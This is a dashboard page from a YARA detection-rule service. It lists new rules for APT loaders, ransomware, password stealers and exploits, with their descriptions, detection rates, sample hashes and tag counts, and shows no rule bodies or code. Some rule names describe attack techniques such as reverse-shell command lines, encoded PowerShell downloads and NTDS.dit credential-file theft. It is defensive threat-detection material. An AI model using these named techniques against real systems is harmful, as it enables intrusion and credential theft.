Valhalla Logo
currently serving 8613 rules
API Key

New YARA Rules per Day

Newest YARA Rules

Rule
Description
Date
Ref
APT_CN_Loader_May19_1
Detects Chinese APT group Loader v1
24.05.2019
APT_CN_NET_Loader_May19_1
Detects Chinese APT group .NET Loader
24.05.2019
APT_CN_RAR_Dropper_May19_1
Detects RAR Dropper used by Chinese APT group in March 2019
24.05.2019
APT_MAL_AridViper_Samples_Gen_May19_1
Detects AridViper samples
24.05.2019
SUSP_Doc_Dropper_Strings_May91_1
Detects strings used in malicious dropper docs
24.05.2019
SUSP_NTDS_SYSTEM_Theft
Detects a copy of the NTDS.dit or SYSTEM file
24.05.2019
SUSP_PS_GetEnv_Startup
Detects suspicious PowerShell script that tries to get the location of the Startup folder
24.05.2019
SUSP_JS_Invoke_BAT_May19_1
Detects suspicious JavaScript file that invokes a Windows batch file
24.05.2019
SUSP_BOT_Path_May19_1
Detects suspicious reference to directory named Bot
24.05.2019
MAL_ME_NET_Malware_May19_1
Detects unknown .NET malware noticed in May 2019
24.05.2019
MAL_CobaltStrike_inMemory_Rule
Detects CobaltStrike strings in memory
24.05.2019
MAL_Unknown_Malware_May19_1
Detects unspecified malware noticed in 2019
23.05.2019
EXPL_Win10_0day_May19_2
Detects tool that exploits Win 10 Schtask Job 0day
22.05.2019
SUSP_EXPL_Win10_0day_May19_2
Detects code that contains commands that look like a Win10 0day
22.05.2019
APT_APT28_Strings_May19_1
Detects strings from Sofacy / APT28 article by ESET in May 2019
22.05.2019
REG_APT28_Backdoor_May19_1
Detects APT28 backdoor strings in registry
22.05.2019
REG_APT10_RUN_Key_May19_1
Detects APT10 backdoor strings in registry
22.05.2019
Gen_AridViper_Malware_Dec17
Detects AridViper related malware spotted in December 2017
22.05.2019
SUSP_PDF_JS_Action
Detects suspicious Javascript in PDF
22.05.2019
SUSP_Obfuscation_IEX_PS1_May19_1
Detects suspicious IEX backtick obfuscation
22.05.2019
SUSP_Impacket_Sample_May19_1
Detects suspicious samples implementing impacket library
22.05.2019
MAL_PDF_JS_Templ_Dropper_May19_1
Detects suspicious Javascript in PDF that looks like a script used in droppers noticed in May 2019
22.05.2019
MAL_Unknown_Pass_Stealer_May19_3
dropzone - file ab3755d71bb677e4bd5684493f2a61912c6fea904aa7f78c18253778b9256fd4
22.05.2019
MAL_Unknown_Pass_Stealer_May19_2
Detects unknown password stealer
22.05.2019
MAL_Unknown_Pass_Stealer_May19_1
Detects unknown password stealer
22.05.2019
HKTL_ConsoleSniffer_May19_1
Detects unknown Console Sniffer tool
21.05.2019
APT_MAL_CS_OceanLotus_May19_1
Detects OceanLotus malware in source code form
21.05.2019
APT_MAL_BAT_OceanLotus_May19_1
Detects OceanLotus helper batch file
21.05.2019
APT_MAL_Doc_OceanLotus_Dropper_May19_1
Detects OceanLotus dropper noticed in May 2019
21.05.2019
SUSP_Encoded_Assembly_Load
Detects encoded keyword - Assembly.Load
21.05.2019
SUSP_MsBuild_AppData_Folder_Target
Detects suspicious msbuild config file pointing to Appdata Temp folder
21.05.2019
SUSP_OBFUSC_Caret_May19_1
Detects obfuscation techniques found in slides by Daniel Bohannon
21.05.2019
SUSP_OBFUSC_Strings_DB_May19_1
Detects obfuscation techniques found in slides by Daniel Bohannon in May 2019
21.05.2019
MAL_NanoCore_RAT_May19_1
Detetcs NanoCore RAT
21.05.2019
MAL_RANSOM_MegaCortex_May19_1
Detects MegaCortex Ransomware
21.05.2019
MAL_RANSOM_MegaCortex_May19_2
Detects MegaCortex Ransomware
21.05.2019
EXPL_RDP_CVE_2019_0708
Detects exploit code exploiting RDP vulnerabilities
20.05.2019
SUSP_RDP_Payload
Detects suspicious payloads (initial PDU) used in rare RDP tools and exploits
20.05.2019
SUSP_MetaSploit_Indicator_Inject
Detects suspicious Metasploit string indicator
20.05.2019
SUSP_CobaltStrike_DB_File
Detects suspicious CobaltStrike DB file noticed in May 2019
20.05.2019

Successful YARA Rules in Set

Rule
Average AV Detection Rate
Sample Count
APT_MuddyWater_CS_CmdLine_Sep18_1
0.0
19
SUSP_MsBuild_AppData_Folder_Target
0.0
34
SUSP_Base64_Encoded_E_IEX
0.67
275
HKTL_DNSCrypt_Proxy
0.82
11
MAL_APT_Gamaredon_BAT_Apr19_1
1.25
12
SUSP_SwearWord_in_Code
1.83
12
SUSP_Encoded_IEX_2
2.02
99
SUSP_Encoded_NewObject_NetWebclient
2.95
119
SUSP_RevShell_CmdLine_Code
3.19
16
SUSP_PS_Base64_CWB_String
3.38
16
HKTL_Koadic_XLS_Template
3.76
25
SUSP_CryptoObfuscator
4.5
16
SUSP_LNX_suspicious_strings_hacking_Dec18
5.55
11
Casing_Anomaly_FromBase64String
5.57
21
SUSP_Base64_Encoded_Hex_Encoded_Code
5.67
33
SUSP_Obfuscated_VBS_Feb19_1
6.0
12
SUSP_Script_Py_SingleLiner_B64
6.5
18
SUSP_Python_OneLiner_Feb19_1
6.81
31
EXP_CVE_2018_14442
7.47
34
Casing_Anomaly_Convert_PS
7.7
27
SUSP_ELF_LNX_UPX_Compressed_File
8.16
115
MAL_NET_MeterPreter_Payload_1
8.3
23
SUSP_Encoded_PS_DownloadString
10.0
14
SUSP_PHP_Obfuscation_GZ_Base64
10.42
12
SUSP_Obfuscation_ChrW_Feb19_1
11.64
47
SUSP_Env_Var_Obfuscation
11.82
44
Casing_Anomaly_NewObject
11.87
31
SUSP_Base64_Encoded_Automation_AmsiUtils
12.27
15
Casing_Anomaly_PowerShell
12.48
282
EXPL_PDF_CVE_2018_4990_Mal_JPEG_Stream
13.56
18

Latest Matches with Low AV Detection Rate

Rule
AVs
Hash
VT
APT_MAL_BronzeUnion_CN_Mal_Cert
1
3222b6855d195528c3ee39b0cc25d40664af3dbc09c6bbb1a5b0b9368d997deb
SUSP_Obfuscated_VBS_Feb19_1
6
1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96
SUSP_Encoded_WriteProcessMemory
6
1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96
SUSP_Encoded_GetCurrentThreadId
6
1c2fc84bd09b03f55f083e63677704fcede033203ec71cbc050368869d428c96
SUSP_Base64_Cmd_Exe
1
a83c95ec56434d90f647fb64d14decb5d1be59f2926e10517d3459e6c3cf0da1
SUSP_Obfuscated_VBS_Feb19_1
6
6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6
SUSP_Base64_Encoded_GetEnvironmentVariable
6
6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6
SUSP_MZ_DefaultStub_in_Encoded_Form
6
6e48e6811f2e0fa0601f82780cd5e61bd970ca094d255a43cb617628bdd5e8f6
SUSP_VBA_Project_Keyword_Feb19_1
5
09ca983edc598ee0ce456361473da86d2faa7090b8ffaa8f5d23eb33615a8d38
APT_MAL_BronzeUnion_CN_Mal_Cert
2
34c7db184231535974ceff908267c1bdf272742efaa351d4e08dff12646bfd88
SUSP_ShellCode_Variable
11
d76b658722f901729724f53889beb298c0a4b001097cdf99bdd9b4da1fcc14a5
APT_MAL_BronzeUnion_CN_Mal_Cert
2
48e888ed552ad598f59be365d3f6fa31fdbf79c52962365a6e96b6711a2120d7
APT_MAL_BronzeUnion_CN_Mal_Cert
2
a4aaae1f7f447072f4b52a6b785c9a58c7311bead3a2b21c512a25f8f7de2210
APT_MAL_BronzeUnion_CN_Mal_Cert
2
9048d7367de572781bbee871fea34b185f7e1855eab215ee606690c25f35c0b2
SUSP_ConfuserEx_Obfuscated_Gen
13
fad77ac94f0ffd4fc6a783b7523532d404fa925b17ef41c4f9b5213b8b7522b1
SUSP_Impacket_Sample_May19_1
1
f865936fd01456b28dd577ec6e1d531f1f87a4bff6a3e5dd1127d98f054acab1
Ebowla_Golang_EXE_Supicious_1
1
493db8c66cfeda0a2ef45491a1310a153eb05cc6c3cf13d58bb04b355eeb9347
EXP_CVE_2018_14442
5
ebda6c801c21dfa4d286967ecedd3806d92700267cbcadaff0a61a05ba7829d8
SUSP_CryptoObfuscator
8
86a78fd81512bb2defad680c5374d8608c18e0c209607c04934d5cbb33814440
SUSP_ConfuserEx_Obfuscated_Gen
10
dcd90bbe4be1036f476419924a5feb4906bc16e634b7af746078345bdc9be5e8

Top Tags in YARA Rule Set

Tag
Count
FILE
5507
EXE
3975
DEMO
2402
MAL
2363
APT
2339
HKTL
2235
T1100
1788
WEBSHELL
1766
CHINA
976
SUSP
945
SCRIPT
574
RUSSIA
367
T1064
306
MIDDLE_EAST
298
GEN
298
T1086
292
T1112
276
T1003
255
REG
242
T1027
237
T1193
197
T1203
197
T1075
190
T1085
141
T1178
134
T1097
134
T1050
131
T1132
130
EXPLOIT
129
OBFUS
121
Error: Embedded README could not be displayed.